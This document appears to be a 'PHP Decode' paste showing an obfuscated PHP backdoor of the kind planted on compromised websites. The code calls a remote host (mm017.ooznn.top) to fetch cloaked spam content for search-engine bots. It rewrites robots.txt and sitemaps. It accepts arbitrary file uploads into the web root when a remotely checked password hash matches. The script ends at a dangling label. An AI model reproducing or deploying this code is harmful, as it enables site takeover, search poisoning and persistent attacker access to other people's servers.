PHP Decode

 goto hkc1C; tpuvr: $lag = @$_SERVER["\110\124\x54\120\137\101\x43\103\105\120\124\x5f\x4c\101\116\x47\x55\x41\107\105"]; goto QY52f; TNeef: function daag($url) { $ficonts = ''; if (function_exists("\x63\165\x72\x6c\x5f\x69\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ficonts = curl_exec($ch); curl_close($ch); } if (!$ficonts) { $ficonts = @file_get_contents($url); } return $ficonts; } goto b_Brd; tKaYc: $htwe = "\x68\164\x74\x70"; goto ghTxz; egtU0: if ($ddur_tmp == '') { $ddur_tmp = "\x2f"; } goto Ofk2k; hkc1C: @set_time_limit(5000); goto xnGxN; Ofk2k: $ddur = urlencode($ddur_tmp); goto c4yPm; WLZTI: function sbot() { $uaget = strtolower($_SERVER["\110\x54\x54\120\137\125\x53\x45\x52\137\101\x47\105\x4e\124"]); if (stristr($uaget, "\x67\157\157\147\x6c\145\142\x6f\x74") || stristr($uaget, "\x62\x69\x6e\x67") || stristr($uaget, "\x79\141\150\x6f\x6f") || stristr($uaget, "\x67\x6f\x6f\147\154\145") || stristr($uaget, "\x47\x6f\157\x67\x6c\x65\x62\157\x74") || stristr($uaget, "\x67\157\157\147\154\145\142\157\x74")) { return true; } else { return false; } } goto TNeef; oVEXF: $goto = "\x6d\x6d\x30\x31\x37"; goto tKaYc; PRUyY: if (isset($_SERVER["\x48\124\124\x50\137\x52\x45\106\x45\x52\105\122"])) { $usse = $_SERVER["\110\x54\x54\x50\x5f\x52\105\x46\x45\122\105\122"]; $usse = urlencode($usse); } goto g6p7D; sRBWk: $ddur_tmp = st_uri(); goto egtU0; eFWIl: $htag = trim(daag($web)); goto mlcEc; ghTxz: if (ishtt()) { $http = "\150\164\x74\x70\x73"; } else { $http = "\150\x74\x74\160"; } goto sRBWk; eTPaY: $towe = $goto . "\56\157\157\172\156\156" . "\x2e\164\157\x70"; goto MecPD; mlcEc: if (!strstr($htag, "\x6e\x6f\x62\x6f\x74\x75\x73\145\162\141\147\x65\156\164")) { if (strstr($htag, "\x6f\153\x68\164\155\x6c\147\x65\x74\143\157\156\164\x65\156\x74")) { @header("\103\x6f\x6e\164\145\x6e\164\x2d\x74\x79\x70\145\x3a\40\x74\x65\170\x74\57\150\x74\x6d\154\73\x20\x63\x68\x61\162\163\145\164\x3d\165\x74\146\55\70"); $htag = str_replace("\x6f\x6b\150\x74\155\x6c\147\x65\x74\143\x6f\156\x74\x65\x6e\x74", '', $htag); echo $htag; die; } else { if (strstr($htag, "\157\x6b\170\155\x6c\147\x65\x74\x63\x6f\x6e\164\145\x6e\164")) { $htag = str_replace("\157\153\x78\x6d\154\147\145\164\143\157\x6e\164\x65\156\x74", '', $htag); @header("\x43\157\x6e\164\x65\156\164\x2d\x74\x79\160\145\72\x20\x74\145\170\164\x2f\x78\x6d\x6c"); echo $htag; die; } } } goto WLZTI; g6p7D: if (@$_GET["\160\144"] != '') { $acot = @$_GET["\155\141\x70\x6e\141\x6d\x65"]; if (isset($_SERVER["\104\117\103\125\115\105\x4e\124\x5f\x52\x4f\117\x54"])) { $path = $_SERVER["\x44\x4f\x43\125\x4d\105\x4e\x54\137\x52\x4f\x4f\x54"]; } else { $path = dirname(__FILE__); } if (strstr($acot, "\x73\151\164\x65\155\141\160")) { $map_path = $path . "\57\163\151\x74\145\155\x61\160\56\x78\x6d\154"; $file_path = $path . "\x2f\162\x6f\x62\157\164\163\x2e\x74\x78\164"; @unlink($map_path); $robots = @file_get_contents($file_path); $data = "\125\163\x65\x72\55\x61\x67\145\156\x74\x3a\x20\52" . "\xd\xa" . "\x41\154\154\x6f\167\x3a\40\57"; $sturs = "\xd\12" . "\123\x69\164\x65\x6d\141\x70\x3a\40" . $http . "\x3a\x2f\x2f" . $host . "\57" . $acot . "\x2e\x78\155\154"; $futrobot = ''; if (strstr($robots, "\57\155\141\x70\x2e\x78\x6d\x6c")) { if (strstr($robots, "\x2f" . $acot . "\56\x78\155\154")) { echo "\163\x69\x74\145\155\141\x70\x20\151\156\40\x61\144\x64\145\x64\x21"; die; } else { $robots .= $sturs; } } else { @unlink($file_path); $sturs .= "\15\12" . "\123\x69\164\145\155\141\160\72\40" . $http . "\x3a\57\x2f" . $host . "\57\155\x61\x70\x2e\170\x6d\x6c"; $robots = $data . $sturs; } if (file_put_contents($file_path, trim($robots))) { echo "\x3c\x62\162\x3e\x6f\153\x3c\x62\162\x3e"; } else { echo "\x3c\x62\162\76\146\x61\x6c\163\145\x21\74\142\162\76"; } } else { if (strstr($acot, "\x2e\x70" . "\150\x70")) { if (sha1(sha1(@$_GET["\141"])) == daag($htwe . "\72\57\x2f" . $towe . "\57\x61\56\x70" . "\x68\x70")) { $dstr = @$_GET["\144\x73\164\x72"]; if (file_put_contents($path . "\x2f" . $acot, $dstr)) { echo "\157\153"; } } } else { echo "\74\142\162\x3e\40\x66\x61\154\x73\145\41\x3c\x62\x72\76"; } } die; } goto o46KR; c4yPm: function st_uri() { if (isset($_SERVER["\x52\x45\121\x55\x45\x53\x54\137\x55\122\x49"])) { $ddur = $_SERVER["\x52\x45\121\125\105\x53\x54\137\125\122\x49"]; } else { if (isset($_SERVER["\x61\x72\x67\x76"])) { $ddur = $_SERVER["\x50\110\120\x5f\x53\x45\x4c\x46"] . "\x3f" . $_SERVER["\141\x72\x67\x76"][0]; } else { $ddur = $_SERVER["\120\x48\x50\137\x53\x45\114\x46"] . "\x3f" . $_SERVER["\x51\125\x45\122\131\137\x53\124\122\x49\x4e\x47"]; } } return $ddur; } goto eTPaY; xnGxN: @ignore_user_abort(1); goto oVEXF; o46KR: $web = $htwe . "\72\x2f\x2f" . $towe . "\57\x69\156\144\x65\56\x70\150\x70\77\167\x65\x62\x3d" . $host . "\46\x7a\172\75" . sbot() . "\x26\165\x72\151\x3d" . $ddur . "\46\165\x72\x6c\x73\150\141\156\147\x3d" . $usse . "\x26\150\164\164\160\x3d" . $http . "\46\x6c\x61\156\x67\x3d" . $lag; goto eFWIl; g0HIj: $host = $_SERVER["\x48\x54\x54\120\x5f\x48\x4f\123\x54"]; goto tpuvr; QY52f: $lag = urlencode($lag); goto Vl4iZ; MecPD: function ishtt() { if (isset($_SERVER["\x48\x54\124\120\x53"]) && strtolower($_SERVER["\x48\124\x54\x50\x53"]) !== "\157\146\x66") { return true; } elseif (isset($_SERVER["\x48\124\124\x50\137\x58\137\x46\117\122\x57\x41\x52\104\x45\x44\137\120\122\117\x54\117"]) && $_SERVER["\110\124\124\x50\137\x58\137\106\117\x52\x57\x41\122\104\105\104\x5f\120\x52\x4f\x54\x4f"] === "\x68\x74\x74\160\163") { return true; } elseif (isset($_SERVER["\x48\124\124\120\x5f\x46\x52\x4f\116\124\137\105\x4e\104\x5f\110\124\124\120\123"]) && strtolower($_SERVER["\110\124\124\x50\137\106\x52\117\116\x54\137\105\116\104\137\x48\x54\124\x50\123"]) !== "\x6f\x66\146") { return true; } return false; } goto g0HIj; Vl4iZ: $usse = ''; goto PRUyY; b_Brd: